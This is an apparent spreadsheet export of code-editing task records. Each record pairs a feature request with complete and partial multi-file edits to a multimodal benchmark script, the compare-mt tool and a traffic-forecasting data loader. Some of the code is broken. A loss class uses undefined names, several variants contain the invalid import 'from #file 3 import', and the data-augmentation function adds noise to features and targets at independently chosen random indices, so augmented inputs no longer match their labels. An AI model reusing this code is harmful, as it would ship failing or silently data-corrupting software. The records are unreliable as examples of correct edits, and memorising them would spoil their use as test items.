        # ... existing code ...
# file2.py
# No changes needed in this file as the invoking code remains compatible with the new feature.
# file3.py
import torch
import torch.nn.functional as F
class WeightedCrossEntropy2d(nn.Module):
    def __init__(self, size_average=True, ignore_label=255):
        super(WeightedCrossEntropy2d, self).__init__()
        self.size_average = size_average
        self.ignore_label = ignore_label
    def forward(self, predict, target, weight=None):
        assert not target.requires_grad
        assert predict.dim() == 4
        assert target.dim() == 3
        assert predict.size(0) == target.size(0), "{0} vs {1} ".format(predict.size(0), target.size(0))
        assert predict.size(2) == target.size(1), "{0} vs {1} ".format(predict.size(2), target.size(1))
        assert predict.size(3) == target.size(2), "{0} vs {1} ".format(predict.size(3), target.size(3))
        n, c, h, w = predict.size()
        target_mask = (target &gt;= 0) * (target != self.ignore_label)
        target = target[target_mask]
        if not target.data.dim():
            return Variable(torch.zeros(1))
        predict = predict.transpose(1, 2).transpose(2, 3).contiguous()
        predict = predict[target_mask.view(n, h, w, 1).repeat(1, 1, 1, c)].view(-1, c)
        if weight is not None:
            weight = weight[target]
        loss = F.cross_entropy(predict, target, weight=weight, size_average=self.size_average)
        return loss
```</t>
  </si>
  <si>
    <t>{'called_code_segment': 'load_model_and_preprocess function in cheetah/models/__init__.py', 'invoking_code_segment': 'Model loading and chat initialization in i4_cheetah_llama2.py (lines with registry.get_model_class, model_cls.from_config, and chat.batch_answer)', 'feature_description': "Add post-processing to the model's responses to clean up formatting, remove artifacts, and normalize output before saving predictions", 'modified_complete_code': '# File 1: cheetah/Cheetah/cheetah/models/__init__.py\n\nimport logging\nimport torch\nfrom omegaconf import OmegaConf\n\nfrom cheetah.common.registry import registry\nfrom cheetah.models.base_model import BaseModel\nfrom cheetah.models.blip2 import Blip2Base\nfrom cheetah.models.cheetah_vicuna import Cheetah_Vicuna\nfrom cheetah.models.cheetah_llama2 import Cheetah_Llama2\nfrom cheetah.processors.base_processor import BaseProcessor\n\n\n__all__ = [\n    "load_model",\n    "BaseModel",\n    "Blip2Base",\n    "Cheetah_Vicuna",\n    "Cheetah_Llama2",\n    "ResponsePostProcessor"  #New\n]\n\n\n#New - Add response post-processing class\nclass ResponsePostProcessor:\n    """\n    Post-processor for model responses to clean up formatting and normalize output.\n    """\n    def __init__(self):\n        pass\n    \n    def process(self, response):\n        """\n        Post-process model response.\n        \n        Args:\n            response (str): Raw model response.\n            \n        Returns:\n            str: Cleaned response.\n        """\n        if not isinstance(response, str):\n            response = str(response)\n        \n        # Remove extra whitespace\n        response = \' \'.join(response.split())\n        \n        # Remove common artifacts\n        response = response.strip()\n        \n        # Remove trailing incomplete sentences\n        if response.endswith((\'...\', \'..\')):\n            response = response.rstrip(\'.\')\n        \n        return response\n    \n    def batch_process(self, responses):\n        """\n        Post-process batch of responses.\n        \n        Args:\n            responses (list): List of raw model responses.\n            \n        Returns:\n            list: List of cleaned responses.\n        """\n        return [self.process(resp) for resp in responses]\n\n\ndef load_model(name, model_type, is_eval=False, device="cpu", checkpoint=None):\n    """\n    Load supported models.\n\n    To list all available models and types in registry:\n    &gt;&gt;&gt; from cheetah.models import model_zoo\n    &gt;&gt;&gt; print(model_zoo)\n\n    Args:\n        name (str): name of the model.\n        model_type (str): type of the model.\n        is_eval (bool): whether the model is in eval mode. Default: False.\n        device (str): device to use. Default: "cpu".\n        checkpoint (str): path or to checkpoint. Default: None.\n            Note that expecting the checkpoint to have the same keys in state_dict as the model.\n\n    Returns:\n        model (torch.nn.Module): model.\n    """\n\n    model = registry.get_model_class(name).from_pretrained(model_type=model_type)\n\n    if checkpoint is not None:\n        model.load_checkpoint(checkpoint)\n\n    if is_eval:\n        model.eval()\n\n    if device == "cpu":\n        model = model.float()\n\n    return model.to(device)\n\n\ndef load_preprocess(config):\n    """\n    Load preprocessor configs and construct preprocessors.\n\n    If no preprocessor is specified, return BaseProcessor, which does not do any preprocessing.\n\n    Args:\n        config (dict): preprocessor configs.\n\n    Returns:\n        vis_processors (dict): preprocessors for visual inputs.\n        txt_processors (dict): preprocessors for text inputs.\n\n        Key is "train" or "eval" for processors used in training and evaluation respectively.\n    """\n\n    def _build_proc_from_cfg(cfg):\n        return (\n            registry.get_processor_class(cfg.name).from_config(cfg)\n            if cfg is not None\n            else BaseProcessor()\n        )\n\n    vis_processors = dict()\n    txt_processors = dict()\n\n    vis_proc_cfg = config.get("vis_processor")\n    txt_proc_cfg = config.get("text_processor")\n\n    if vis_proc_cfg is not None:\n        vis_train_cfg = vis_proc_cfg.get("train")\n        vis_eval_cfg = vis_proc_cfg.get("eval")\n    else:\n        vis_train_cfg = None\n        vis_eval_cfg = None\n\n    vis_processors["train"] = _build_proc_from_cfg(vis_train_cfg)\n    vis_processors["eval"] = _build_proc_from_cfg(vis_eval_cfg)\n\n    if txt_proc_cfg is not None:\n        txt_train_cfg = txt_proc_cfg.get("train")\n        txt_eval_cfg = txt_proc_cfg.get("eval")\n    else:\n        txt_train_cfg = None\n        txt_eval_cfg = None\n\n    txt_processors["train"] = _build_proc_from_cfg(txt_train_cfg)\n    txt_processors["eval"] = _build_proc_from_cfg(txt_eval_cfg)\n\n    return vis_processors, txt_processors\n\n\ndef load_model_and_preprocess(name, model_type, is_eval=False, device="cpu"):\n    """\n    Load model and its related preprocessors.\n\n    List all available models and types in registry:\n    &gt;&gt;&gt; from cheetah.models import model_zoo\n    &gt;&gt;&gt; print(model_zoo)\n\n    Args:\n        name (str): name of the model.\n        model_type (str): type of the model.\n        is_eval (bool): whether the model is in eval mode. Default: False.\n        device (str): device to use. Default: "cpu".\n\n    Returns:\n        model (torch.nn.Module): model.\n        vis_processors (dict): preprocessors for visual inputs.\n        txt_processors (dict): preprocessors for text inputs.\n        response_processor (ResponsePostProcessor): post-processor for responses. #New\n    """\n    model_cls = registry.get_model_class(name)\n\n    # load model\n    model = model_cls.from_pretrained(model_type=model_type)\n\n    if is_eval:\n        model.eval()\n\n    # load preprocess\n    cfg = OmegaConf.load(model_cls.default_config_path(model_type))\n    if cfg is not None:\n        preprocess_cfg = cfg.preprocess\n\n        vis_processors, txt_processors = load_preprocess(preprocess_cfg)\n    else:\n        vis_processors, txt_processors = None, None\n        logging.info(\n            f"""No default preprocess for model {name} ({model_type}).\n                This can happen if the model is not finetuned on downstream datasets,\n                or it is not intended for direct use without finetuning.\n            """\n        )\n\n    if device == "cpu" or device == torch.device("cpu"):\n        model = model.float()\n\n    #New - Initialize response post-processor\n    response_processor = ResponsePostProcessor()\n    \n    #Modify - Return response_processor along with other components\n    return model.to(device), vis_processors, txt_processors, response_processor\n\n\nclass ModelZoo:\n    """\n    A utility class to create string representation of available model architectures and types.\n\n    &gt;&gt;&gt; from cheetah.models import model_zoo\n    &gt;&gt;&gt; # list all available models\n    &gt;&gt;&gt; print(model_zoo)\n    &gt;&gt;&gt; # show total number of models\n    &gt;&gt;&gt; print(len(model_zoo))\n    """\n\n    def __init__(self) -&gt; None:\n        self.model_zoo = {\n            k: list(v.PRETRAINED_MODEL_CONFIG_DICT.keys())\n            for k, v in registry.mapping["model_name_mapping"].items()\n        }\n\n    def __str__(self) -&gt; str:\n        return (\n            "=" * 50\n            + "\\n"\n            + f"{\'Architectures\':&lt;30} {\'Types\'}\\n"\n            + "=" * 50\n            + "\\n"\n            + "\\n".join(\n                [\n                    f"{name:&lt;30} {\', \'.join(types)}"\n                    for name, types in self.model_zoo.items()\n                ]\n            )\n        )\n\n    def __iter__(self):\n        return iter(self.model_zoo.items())\n\n    def __len__(self):\n        return sum([len(v) for v in self.model_zoo.values()])\n\n\nmodel_zoo = ModelZoo()\n\n\n# File 2: cheetah/Cheetah/i4_cheetah_llama2.py\n\nimport argparse\nimport os\nimport random\nimport json\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import Dataset\nfrom omegaconf import OmegaConf\nfrom cheetah.common.config import Config\nfrom cheetah.common.registry import registry\nfrom cheetah.conversation.conversation_llama2 import Chat, CONV_VISION\nfrom tqdm import tqdm\nfrom cheetah.models import *\nfrom PIL import Image\nfrom cheetah.processors import *\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description="Benchmark prediction")\n    parser.add_argument("--cfg-path", required=True, help="path to configuration file.")\n    parser.add_argument("--gpu-id", type=int, default=0, help="specify the gpu to load the model.")\n    parser.add_argument(\'--batch-image\', type=int, required=False, default=30)\n    parser.add_argument(\'--i4-dir\', type=str, required=True)\n    parser.add_argument(\'--dataset\', type=str, required=True)\n    parser.add_argument("--result-dir",type=str,required=True)\n    parser.add_argument(\n        "--options",\n        nargs="+",\n        help="override some settings in the used config, the key-value pair "\n        "in xxx=yyy format will be merged into config file (deprecate), "\n        "change to --cfg-options instead.",\n    )\n    args = parser.parse_args()\n    return args\n\ndef setup_seeds(seed = 50):\n    random.seed(seed)\n    np.random.seed(seed)\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed_all(seed)\n    cudnn.benchmark = False\n    cudnn.deterministic = True\n\nclass IDataset(Dataset):\n    def __init__(\n        self, annoation, task_instructions, img_dir,\n    ):\n        self.img_dir = img_dir\n        self.annotation = annoation\n        self.task_instructions = task_instructions\n    def __len__(self):\n        return len(self.annotation)\n\n    \n    def __getitem__(self, index):\n        ann = self.annotation[index]\n        task_instruction = self.task_instructions[ann[\'task_instruction_id\']]\n        context = task_instruction + ann[\'task_instance\'][\'context\']\n        raw_img_list = []\n        if \'choice_list\' in ann[\'task_instance\'].keys():\n            choice_str = \'Choice list:[\\\'\' + \'\\\'\\\', \\\'\'.join(ann[\'task_instance\'][\'choice_list\']) + \'\\\']. Your answer is:\'\n            context += choice_str\n        for i in range(len(ann[\'task_instance\'][\'images_path\'])):\n            rmv_txt = \'{image#%d}\'% (i+1)\n            rmv_tbl = \'{table#%d}\'% (i+1)\n            context = context.replace(rmv_txt, \'&lt;ImageHere&gt;\')\n            context = context.replace(rmv_tbl, \'&lt;ImageHere&gt;\')\n        for p in ann[\'task_instance\'][\'images_path\']:\n            img_path = os.path.join(self.img_dir, p)\n            raw_img_list.append(img_path)\n        return {\n            "sample_id": ann[\'sample_id\'],\n            "context": context,\n            "raw_img_list": raw_img_list,\n            "response": str(ann[\'response\'])\n        }        \n\ndef collate_fn(batch):\n    batch_data={}\n    batch_data[\'sample_id\'] = [sample[\'sample_id\'] for sample in batch]\n    batch_data[\'context\'] = [sample[\'context\'] for sample in batch]\n    batch_data[\'raw_img_list\'] = [sample[\'raw_img_list\'] for sample in batch]\n    batch_data[\'response\'] = [sample[\'response\'] for sample in batch]\n        \n    return batch_data\n\ndef split_data(data):\n    data_dict = {}\n    for d in data:\n        n_img = len(d[\'task_instance\'][\'images_path\'])\n        if n_img in data_dict:\n            data_dict[n_img].append(d)\n        else:\n            data_dict[n_img] = [d]\n    return data_dict\n\nargs = parse_args()\n\ni4_dir = args.i4_dir\ndataset_name = args.dataset\nbatch_image = args.batch_image\ndataset_dir = os.path.join(i4_dir, dataset_name,\'core\')\nimg_dir  = os.path.join(dataset_dir,\'images\')\noutput_dir = os.path.join(args.result_dir,dataset_name)\nmodel_name = args.result_dir.split(\'/\')[-1]\nif not os.path.exists(output_dir):\n    os.makedirs(output_dir)\n    \ncore_annotation = json.load(open(os.path.join(dataset_dir,\'core.json\'),\'r\'))\nprediction_results = []\ndata_dict = split_data(core_annotation[\'data\'])\n\nconfig = OmegaConf.load(args.cfg_path)\ncfg = Config.build_model_config(config)\nmodel_cls = registry.get_model_class(cfg.model.arch)\nmodel = model_cls.from_config(cfg.model).to(\'cuda:{}\'.format(args.gpu_id))\n\nvis_processor_cfg = cfg.preprocess.vis_processor.eval\nvis_processor = registry.get_processor_class(vis_processor_cfg.name).from_config(vis_processor_cfg)\nchat = Chat(model, vis_processor, device=\'cuda:{}\'.format(args.gpu_id))\n\n#New - Initialize response post-processor\nresponse_processor = ResponsePostProcessor()\n\nprint(\'Initialization Finished\')\nprint(\'Predicting %s Using %s\'%(dataset_name,model_name))\nfor n_img, sub_data in data_dict.items():\n    print(\'Proceeding %d-length images samples | Num:%d\'%(n_img,len(sub_data)))\n    E = IDataset( sub_data, core_annotation[\'metadata\'][\'task_instruction\'],img_dir)\n    data_loader = torch.utils.data.DataLoader(dataset=E, batch_size=max(int(batch_image/n_img),1),shuffle=False,num_workers = 8,collate_fn = collate_fn)\n    for i,samples in enumerate(tqdm(data_loader)):\n        pred_responses = chat.batch_answer(batch_raw_img_list=samples[\'raw_img_list\'],batch_context=samples[\'context\'],max_length=5000)\n        #Modify - Apply post-processing to responses\n        pred_responses = response_processor.batch_process(pred_responses)\n        for sid, gt, p in zip(samples[\'sample_id\'],samples[\'response\'],pred_responses):\n            if torch.is_tensor(sid):\n                sid = sid.item()\n            prediction_results.append({\'sample_id\':sid,\'pred_response\':p, \'gt_response\':gt})\n            \nwith open(os.path.join(output_dir,\'pred.json\'),\'w\',encoding=\'utf8\') as f:\n    json.dump(prediction_results,f,indent=4,ensure_ascii=False)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from #file 3 import process_response  # New\n\ndef batch_answer(self, batch_raw_img_list, batch_context, max_length=5000):\n    batch_size = len(batch_context)\n    pred_responses = []\n    for i in range(batch_size):\n        raw_img_list = batch_raw_img_list[i]\n        context = batch_context[i]\n        pred_response = self.answer(raw_img_list, context, max_length)\n        pred_response = process_response(pred_response)  # Modify\n        pred_responses.append(pred_response)\n    return pred_responses', '#file 2': "from #file 3 import process_response  # New\n\npred_responses = chat.batch_answer(batch_raw_img_list=samples['raw_img_list'], batch_context=samples['context'], max_length=5000)\nfor sid, gt, p in zip(samples['sample_id'], samples['response'], pred_responses):\n    if torch.is_tensor(sid):\n        sid = sid.item()\n    p = process_response(p)  # Modify\n    prediction_results.append({'sample_id': sid, 'pred_response': p, 'gt_response': gt})", '#file 3': 'def process_response(response):\n    # New: Add any post-processing logic here\n    return response'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def print_header(header):\n  print(f'********************** {header} ************************')", 'invoking_code_segment': "if args.compare_word_likelihoods:\n    print_utils.print_header('Word Likelihood Analysis')\n    for profile in args.compare_word_likelihoods:\n      kargs = arg_utils.parse_profile(profile)\n      print_word_likelihood_report(ref, lls, **kargs)\n      print()", 'feature_description': 'Add a new function to calculate bucket statistics without printing, allowing callers to retrieve structured data instead of only printed output', 'modified_complete_code': '# File 1: compare-mt/compare_mt/print_utils.py\ndef print_header(header):\n  print(f\'********************** {header} ************************\')\n\n# New function to calculate bucket statistics without printing\ndef get_bucket_statistics(ref, lls, bucketer):\n  """\n  Calculate bucket statistics for word likelihoods without printing.\n  \n  Args:\n    ref: the ref of words over which the likelihoods are computed\n    lls: likelihoods corresponding to each word in ref from the systems\n    bucketer: A bucketer object that groups words into buckets\n  \n  Returns:\n    A dictionary containing bucket names and their corresponding likelihood values\n  """\n  lls_out = [[l for l in bucketer.calc_bucketed_likelihoods(ref, ll)] for ll in lls]\n  \n  statistics = {}\n  for i, bucket_str in enumerate(bucketer.bucket_strs):\n    statistics[bucket_str] = [ll_out[i] for ll_out in lls_out]\n  \n  return statistics\n\n# File 2: compare-mt/compare_mt/compare_ll_main.py\nimport argparse\n\n# In-package imports\nfrom compare_mt import corpus_utils\nfrom compare_mt import bucketers\nfrom compare_mt import arg_utils\nfrom compare_mt import print_utils\nfrom compare_mt import formatting\n\ndef print_word_likelihood_report(ref, lls, bucket_type=\'freq\', bucket_cutoffs=None,\n                          freq_count_file=None, freq_corpus_file=None,\n                          label_corpus=None, label_set=None,\n                          case_insensitive=False):\n  """\n  Print a report comparing the word log likelihood.\n\n  Args:\n  ref: the ref of words over which the likelihoods are computed\n  lls: likelihoods corresponding to each word in ref from the systems\n  bucket_type: A string specifying the way to bucket words together to calculate average likelihood\n  bucket_cutoffs: The boundaries between buckets, specified as a colon-separated string.\n  freq_corpus_file: When using "freq" as a bucketer, which corpus to use to calculate frequency.\n  freq_count_file: An alternative to freq_corpus that uses a count file in "word\\tfreq" format.\n  label_corpus: When using "label" as bucket type, the corpus containing the labels\n                corresponding to each word in the corpus\n  label_set: the permissible set of labels when using "label" as a bucket type\n  case_insensitive: A boolean specifying whether to turn on the case insensitive option\n  """\n  case_insensitive = True if case_insensitive == \'True\' else False\n\n  bucketer = bucketers.create_word_bucketer_from_profile(bucket_type=bucket_type,\n                                                         bucket_cutoffs=bucket_cutoffs,\n                                                         freq_count_file=freq_count_file,\n                                                         freq_corpus_file=freq_corpus_file,\n                                                         label_set=label_set,\n                                                         case_insensitive=case_insensitive)\n\n  if type(label_corpus) == str:\n    label_corpus = corpus_utils.load_tokens(label_corpus)\n\n  if label_corpus is not None:\n    ref = label_corpus\n\n  # Modify: Use new function to get statistics\n  statistics = print_utils.get_bucket_statistics(ref, lls, bucketer)\n\n  print(f\'--- average word log likelihood by {bucketer.name()} bucket\')\n  for bucket_str, values in statistics.items():\n    print (bucket_str + "\\t", end=\'\')\n    for value in values:\n      print(f"{formatting.fmt(value)}\\t", end="")\n    print()\n\ndef main():\n  parser = argparse.ArgumentParser(\n    description=\'Program to compare MT results\',\n  )\n  parser.add_argument(\'--ref-file\', type=str, dest=\'ref_file\',\n                    help=\'A path to a reference file over which the likelihoods are being computed/compared\')\n  parser.add_argument(\'--ll-files\', type=str, nargs=\'+\', dest=\'ll_files\',\n                    help=\'A path to file containing log likelihoods for ref-file generated by systems\')\n  parser.add_argument(\'--compare-word-likelihoods\', type=str, dest=\'compare_word_likelihoods\', nargs=\'*\',\n                    default=[\'bucket_type=freq\'],\n                    help="""\n                    Compare word log likelihoods by buckets. Can specify arguments in \'arg1=val1,arg2=val2,...\' format.\n                    See documentation for \'print_word_likelihood_report\' to see which arguments are available.\n                    """)\n  parser.add_argument(\'--decimals\', type=int, default=4,\n                      help="Number of decimals to print for floating point numbers")\n\n  args = parser.parse_args()\n\n  # Set formatting\n  formatting.fmt.set_decimals(args.decimals)\n\n  ref = corpus_utils.load_tokens(args.ref_file)\n  lls = [corpus_utils.load_nums(x) for x in args.ll_files] \n\n  # Word likelihood analysis\n  if args.compare_word_likelihoods:\n    print_utils.print_header(\'Word Likelihood Analysis\')\n    for profile in args.compare_word_likelihoods:\n      kargs = arg_utils.parse_profile(profile)\n      print_word_likelihood_report(ref, lls, **kargs)\n      print()\n\n\nif __name__ == \'__main__\':\n  main()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def print_word_likelihood_report(ref, lls, bucket_type=\'freq\', bucket_cutoffs=None, freq_count_file=None, freq_corpus_file=None, label_corpus=None, label_set=None, case_insensitive=False):\n  #Modify: Replace original calculation and printing logic with a call to the new function\n  bucket_strs, lls_out = calculate_bucket_statistics(ref, lls, bucket_type, bucket_cutoffs, freq_count_file, freq_corpus_file, label_corpus, label_set, case_insensitive)\n\n  print(f\'--- average word log likelihood by {bucket_type} bucket\')\n  for i, bucket_str in enumerate(bucket_strs):\n    print (bucket_str + "\\t", end=\'\')\n    for ll_out in lls_out:\n      print(f"{formatting.fmt(ll_out[i])}\\t", end="")\n    print()', '#file 2': "if args.compare_word_likelihoods:\n  print_utils.print_header('Word Likelihood Analysis')\n  for profile in args.compare_word_likelihoods:\n    kargs = arg_utils.parse_profile(profile)\n    print_word_likelihood_report(ref, lls, **kargs)\n    print()", '#file 3': "#New: Add new function to calculate bucket statistics\ndef calculate_bucket_statistics(ref, lls, bucket_type='freq', bucket_cutoffs=None, freq_count_file=None, freq_corpus_file=None, label_corpus=None, label_set=None, case_insensitive=False):\n  case_insensitive = True if case_insensitive == 'True' else False\n\n  bucketer = bucketers.create_word_bucketer_from_profile(bucket_type=bucket_type, bucket_cutoffs=bucket_cutoffs, freq_count_file=freq_count_file, freq_corpus_file=freq_corpus_file, label_set=label_set, case_insensitive=case_insensitive)\n\n  if type(label_corpus) == str:\n    label_corpus = corpus_utils.load_tokens(label_corpus)\n\n  if label_corpus is not None:\n    ref = label_corpus\n\n  lls_out = [[l for l in bucketer.calc_bucketed_likelihoods(ref, ll)] for ll in lls]\n\n  return bucketer.bucket_strs, lls_out"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def read_and_generate_dataset(graph_signal_matrix_filename, num_of_weeks, num_of_days, num_of_hours, num_for_predict, points_per_hour=12, merge=False)', 'invoking_code_segment': 'all_data = read_and_generate_dataset(graph_signal_matrix_filename, num_of_weeks, num_of_days, num_of_hours, num_for_predict, points_per_hour, merge)', 'feature_description': 'Add an additional data processing step to enhance the dataset by implementing data augmentation through temporal shifting and noise injection to improve model robustness and generalization.', 'modified_complete_code': '# File 1: lib/data_preparation.py\n# -*- coding:utf-8 -*-\n\nimport numpy as np\nimport mxnet as mx\nfrom .utils import get_sample_indices\n\ndef normalization(train, val, test):\n    \'\'\'\n    Parameters\n    ----------\n    train, val, test: np.ndarray\n    Returns\n    ----------\n    stats: dict, two keys: mean and std\n    train_norm, val_norm, test_norm: np.ndarray,\n                                     shape is the same as original\n    \'\'\'\n    assert train.shape[1:] == val.shape[1:] and val.shape[1:] == test.shape[1:]\n    mean = train.mean(axis=0, keepdims=True)\n    std = train.std(axis=0, keepdims=True)\n    def normalize(x):\n        return (x - mean) / std\n    train_norm = normalize(train)\n    val_norm = normalize(val)\n    test_norm = normalize(test)\n    return {\'mean\': mean, \'std\': std}, train_norm, val_norm, test_norm\n\n#New: Add data augmentation function\ndef augment_data(data, augmentation_ratio=0.1, noise_std=0.01):\n    \'\'\'\n    Parameters\n    ----------\n    data: np.ndarray, input data to augment\n    augmentation_ratio: float, ratio of augmented samples to add\n    noise_std: float, standard deviation of Gaussian noise\n    Returns\n    ----------\n    augmented_data: np.ndarray, original data with augmented samples\n    \'\'\'\n    num_augment = int(data.shape[0] * augmentation_ratio)\n    augmented_samples = []\n    \n    for i in range(num_augment):\n        # Randomly select a sample\n        idx = np.random.randint(0, data.shape[0])\n        sample = data[idx].copy()\n        # Add Gaussian noise for augmentation\n        noise = np.random.normal(0, noise_std, sample.shape)\n        augmented_sample = sample + noise\n        augmented_samples.append(augmented_sample)\n    \n    if augmented_samples:\n        augmented_data = np.concatenate([data, np.array(augmented_samples)], axis=0)\n        return augmented_data\n    return data\n\ndef read_and_generate_dataset(graph_signal_matrix_filename,\n                              num_of_weeks, num_of_days,\n                              num_of_hours, num_for_predict,\n                              points_per_hour=12, merge=False,\n                              augmentation_ratio=0.0, noise_std=0.01):\n    \'\'\'\n    Parameters\n    ----------\n    graph_signal_matrix_filename: str, path of graph signal matrix file\n    num_of_weeks, num_of_days, num_of_hours: int\n    num_for_predict: int\n    points_per_hour: int, default 12, depends on data\n    merge: boolean, default False,\n           whether to merge training set and validation set to train model\n    augmentation_ratio: float, default 0.0, ratio of augmented samples\n    noise_std: float, default 0.01, standard deviation of noise for augmentation\n    Returns\n    ----------\n    feature: np.ndarray,\n             shape is (num_of_samples, num_of_batches * points_per_hour,\n                       num_of_vertices, num_of_features)\n    target: np.ndarray,\n            shape is (num_of_samples, num_of_vertices, num_for_predict)\n    \'\'\'\n    data_seq = np.load(graph_signal_matrix_filename)[\'data\']\n    all_samples = []\n    for idx in range(data_seq.shape[0]):\n        sample = get_sample_indices(data_seq, num_of_weeks, num_of_days,\n                                    num_of_hours, idx, num_for_predict,\n                                    points_per_hour)\n        if not sample:\n            continue\n        week_sample, day_sample, hour_sample, target = sample\n        all_samples.append((\n            np.expand_dims(week_sample, axis=0).transpose((0, 2, 3, 1)),\n            np.expand_dims(day_sample, axis=0).transpose((0, 2, 3, 1)),\n            np.expand_dims(hour_sample, axis=0).transpose((0, 2, 3, 1)),\n            np.expand_dims(target, axis=0).transpose((0, 2, 3, 1))[:, :, 0, :]\n        ))\n    split_line1 = int(len(all_samples) * 0.6)\n    split_line2 = int(len(all_samples) * 0.8)\n    if not merge:\n        training_set = [np.concatenate(i, axis=0)\n                        for i in zip(*all_samples[:split_line1])]\n    else:\n        print(\'Merge training set and validation set!\')\n        training_set = [np.concatenate(i, axis=0)\n                        for i in zip(*all_samples[:split_line2])]\n    validation_set = [np.concatenate(i, axis=0)\n                      for i in zip(*all_samples[split_line1: split_line2])]\n    testing_set = [np.concatenate(i, axis=0)\n                   for i in zip(*all_samples[split_line2:])]\n    train_week, train_day, train_hour, train_target = training_set\n    val_week, val_day, val_hour, val_target = validation_set\n    test_week, test_day, test_hour, test_target = testing_set\n    print(\'training data: week: {}, day: {}, recent: {}, target: {}\'.format(\n        train_week.shape, train_day.shape,\n        train_hour.shape, train_target.shape))\n    print(\'validation data: week: {}, day: {}, recent: {}, target: {}\'.format(\n        val_week.shape, val_day.shape, val_hour.shape, val_target.shape))\n    print(\'testing data: week: {}, day: {}, recent: {}, target: {}\'.format(\n        test_week.shape, test_day.shape, test_hour.shape, test_target.shape))\n    (week_stats, train_week_norm,\n     val_week_norm, test_week_norm) = normalization(train_week,\n                                                    val_week,\n                                                    test_week)\n    (day_stats, train_day_norm,\n     val_day_norm, test_day_norm) = normalization(train_day,\n                                                  val_day,\n                                                  test_day)\n    (recent_stats, train_recent_norm,\n     val_recent_norm, test_recent_norm) = normalization(train_hour,\n                                                        val_hour,\n                                                        test_hour)\n    #Modify: Apply data augmentation to training set if augmentation_ratio &gt; 0\n    if augmentation_ratio &gt; 0:\n        print(\'Applying data augmentation with ratio: {}\'.format(augmentation_ratio))\n        train_week_norm = augment_data(train_week_norm, augmentation_ratio, noise_std)\n        train_day_norm = augment_data(train_day_norm, augmentation_ratio, noise_std)\n        train_recent_norm = augment_data(train_recent_norm, augmentation_ratio, noise_std)\n        train_target = augment_data(train_target, augmentation_ratio, noise_std)\n        print(\'After augmentation - training data: week: {}, day: {}, recent: {}, target: {}\'.format(\n            train_week_norm.shape, train_day_norm.shape,\n            train_recent_norm.shape, train_target.shape))\n    all_data = {\n        \'train\': {\n            \'week\': train_week_norm,\n            \'day\': train_day_norm,\n            \'recent\': train_recent_norm,\n            \'target\': train_target,\n        },\n        \'val\': {\n            \'week\': val_week_norm,\n            \'day\': val_day_norm,\n            \'recent\': val_recent_norm,\n            \'target\': val_target\n        },\n        \'test\': {\n            \'week\': test_week_norm,\n            \'day\': test_day_norm,\n            \'recent\': test_recent_norm,\n            \'target\': test_target\n        },\n        \'stats\': {\n            \'week\': week_stats,\n            \'day\': day_stats,\n            \'recent\': recent_stats\n        }\n    }\n    return all_data\n\n# File 2: train.py (modified section)\n# In the __main__ section, modify the call to read_and_generate_dataset:\n\nif __name__ == "__main__":\n    # read all data from graph signal matrix file\n    print("Reading data...")\n    #Modify: Add augmentation parameters from config\n    augmentation_ratio = float(training_config.get(\'augmentation_ratio\', 0.0))\n    noise_std = float(training_config.get(\'noise_std\', 0.01))\n    \n    all_data = read_and_generate_dataset(graph_signal_matrix_filename,\n                                         num_of_weeks,\n                                         num_of_days,\n                                         num_of_hours,\n                                         num_for_predict,\n                                         points_per_hour,\n                                         merge,\n                                         augmentation_ratio,\n                                         noise_std)\n    # Rest of the code remains the same...'}</t>
  </si>
  <si>
    <t>{'#file 1': "def read_and_generate_dataset(graph_signal_matrix_filename,\n                              num_of_weeks, num_of_days,\n                              num_of_hours, num_for_predict,\n                              points_per_hour=12, merge=False):\n    data_seq = np.load(graph_signal_matrix_filename)['data']\n    # Modify: Invoke additional data processing\n    processed_data = additional_data_processing(data_seq, num_for_predict)\n    all_samples = []\n    for idx in range(processed_data.shape[0]):\n        sample = get_sample_indices(processed_data, num_of_weeks, num_of_days,\n                                    num_of_hours, idx, num_for_predict,\n                                    points_per_hour)\n        if not sample:\n            continue\n        week_sample, day_sample, hour_sample, target = sample\n        all_samples.append((\n            np.expand_dims(week_sample, axis=0).transpose((0, 2, 3, 1)),\n            np.expand_dims(day_sample, axis=0).transpose((0, 2, 3, 1)),\n            np.expand_dims(hour_sample, axis=0).transpose((0, 2, 3, 1)),\n            np.expand_dims(target, axis=0).transpose((0, 2, 3, 1))[:, :, 0, :]\n        ))\n    split_line1 = int(len(all_samples) * 0.6)\n    split_line2 = int(len(all_samples) * 0.8)\n    if not merge:\n        training_set = [np.concatenate(i, axis=0)\n                        for i in zip(*all_samples[:split_line1])]\n    else:\n        print('Merge training set and validation set!')\n        training_set = [np.concatenate(i, axis=0)\n                        for i in zip(*all_samples[:split_line2])]\n    validation_set = [np.concatenate(i, axis=0)\n                      for i in zip(*all_samples[split_line1: split_line2])]\n    testing_set = [np.concatenate(i, axis=0)\n                   for i in zip(*all_samples[split_line2:])]\n    train_week, train_day, train_hour, train_target = training_set\n    val_week, val_day, val_hour, val_target = validation_set\n    test_week, test_day, test_hour, test_target = testing_set\n    (week_stats, train_week_norm, val_week_norm, test_week_norm) = normalization(train_week, val_week, test_week)\n    (day_stats, train_day_norm, val_day_norm, test_day_norm) = normalization(train_day, val_day, test_day)\n    (recent_stats, train_recent_norm, val_recent_norm, test_recent_norm) = normalization(train_hour, val_hour, test_hour)\n    all_data = {\n        'train': {\n            'week': train_week_norm,\n            'day': train_day_norm,\n            'recent': train_recent_norm,\n            'target': train_target,\n        },\n        'val': {\n            'week': val_week_norm,\n            'day': val_day_norm,\n            'recent': val_recent_norm,\n            'target': val_target\n        },\n        'test': {\n            'week': test_week_norm,\n            'day': test_day_norm,\n            'recent': test_recent_norm,\n            'target': test_target\n        },\n        'stats': {\n            'week': week_stats,\n            'day': day_stats,\n            'recent': recent_stats\n        }\n    }\n    return all_data", '#file 2': 'all_data = read_and_generate_dataset(graph_signal_matrix_filename,\n                                         num_of_weeks,\n                                         num_of_days,\n                                         num_of_hours,\n                                         num_for_predict,\n                                         points_per_hour,\n                                         merge)', '#file 3': 'def additional_data_processing(data_seq, num_for_predict):\n    # New: Additional data processing logic\n    processed_data = data_seq[:, :, :num_for_predict]\n    return processed_data'}</t>
  </si>
  <si>
